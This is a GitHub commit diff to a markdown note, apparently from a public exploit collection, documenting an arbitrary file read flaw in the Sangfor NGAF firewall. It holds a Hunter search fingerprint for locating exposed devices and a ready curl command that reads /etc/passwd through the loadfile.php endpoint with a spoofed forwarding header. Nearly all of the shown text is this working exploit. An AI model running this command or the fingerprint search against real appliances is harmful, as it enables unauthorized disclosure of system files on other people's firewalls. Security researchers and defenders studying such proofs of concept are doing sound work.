Update 深信服下一代防火墙NGAF任意文件读取漏洞.md

This commit is contained in:
wy876
2023-10-21 20:38:02 +08:00
committed by GitHub
parent ae959c8a05
commit 3bf256eff5

View File

@@ -7,6 +7,7 @@
## hunter:
web.body="LogInOut.php?type=logout"
## 漏洞复现
```
curl --insecure https://<host>:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"